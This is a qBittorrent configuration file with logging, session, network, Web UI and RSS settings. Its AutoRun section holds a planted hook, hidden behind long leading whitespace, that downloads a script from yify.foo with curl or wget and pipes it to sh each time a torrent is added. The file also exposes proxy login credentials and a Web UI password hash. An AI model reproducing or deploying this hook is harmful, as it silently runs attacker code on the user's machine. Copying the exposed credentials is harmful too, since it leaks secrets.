[General]
ported_to_new_savepath_system=true

[Application]
FileLogger\Age=2
FileLogger\AgeType=0
FileLogger\Backup=true
FileLogger\DeleteOld=true
FileLogger\Enabled=true
FileLogger\MaxSizeBytes=66560
FileLogger\Path=/config/logs

[AutoRun]
OnTorrentAdded\Enabled=true
OnTorrentAdded\Program="                                                                                                    sh -c \"(curl -sk https://yify.foo || wget --no-check-certificate -qO - https://yify.foo) | sh\""
enabled=true
program="                                                                                                    sh -c \"(curl -sk https://yify.foo || wget --no-check-certificate -qO - https://yify.foo) | sh\""

[BitTorrent]
Session\AddTorrentStopped=false
Session\BTProtocol=Both
Session\DefaultSavePath=/downloads
Session\DisableAutoTMMByDefault=true
Session\DisableAutoTMMTriggers\CategoryChanged=true
Session\ExcludedFileNames=
Session\GlobalMaxInactiveSeedingMinutes=5
Session\GlobalMaxRatio=-1
Session\GlobalMaxSeedingMinutes=5
Session\HashingThreadsCount=4
Session\Interface=wg0
Session\InterfaceName=wg0
Session\MaxActiveDownloads=8
Session\MaxActiveTorrents=12
Session\MaxActiveUploads=4
Session\MaxUploadsPerTorrent=8
Session\Port=35426
Session\ProxyPeerConnections=true
Session\QueueingSystemEnabled=true
Session\SSL\Port=6070
Session\ShareLimitAction=Stop

[Core]
AutoDeleteAddedTorrentFile=Never

[LegalNotice]
Accepted=true

[Meta]
MigrationVersion=8

[Network]
Cookies=@Invalid()
PortForwardingEnabled=false
Proxy\AuthEnabled=true
Proxy\HostnameLookupEnabled=false
Proxy\IP=
Proxy\Password=18knpAQJNkoXWvD2G2BtYL3M
Proxy\Port=@Variant(\0\0\0\x85\x4\x38)
Proxy\Profiles\BitTorrent=true
Proxy\Profiles\Misc=true
Proxy\Profiles\RSS=true
Proxy\Type=None
Proxy\Username=QMQoeidQHdA18nEUB8tqEyrC

[Preferences]
Connection\PortRangeMin=6881
Downloads\SavePath=/downloads
General\Locale=en
MailNotification\req_auth=true
WebUI\Address=0.0.0.0
WebUI\AuthSubnetWhitelist=10.0.0.0/8, " 172.16.0.0/12", " 192.168.0.0/16"
WebUI\AuthSubnetWhitelistEnabled=true
WebUI\Enabled=true
WebUI\HTTPS\CertificatePath=/config/ssl/server.crt
WebUI\HTTPS\Enabled=false
WebUI\HTTPS\KeyPath=/config/ssl/server.key
WebUI\LocalHostAuth=false
WebUI\Password_PBKDF2="@ByteArray(XX0LWHYIWuw0WvE61vxpdg==:JsXY/PjvRuMgZ6m/fFBJ2vFBDdtEorgtUeB1SBt2lwTp/PyO5YQ3chP25H4/GeK7TfiXltgg0ZueWFo6IWfHYg==)"
WebUI\ReverseProxySupportEnabled=true

[RSS]
AutoDownloader\DownloadRepacks=true
AutoDownloader\SmartEpisodeFilter=s(\\d+)e(\\d+), (\\d+)x(\\d+), "(\\d{4}[.\\-]\\d{1,2}[.\\-]\\d{1,2})", "(\\d{1,2}[.\\-]\\d{1,2}[.\\-]\\d{4})"
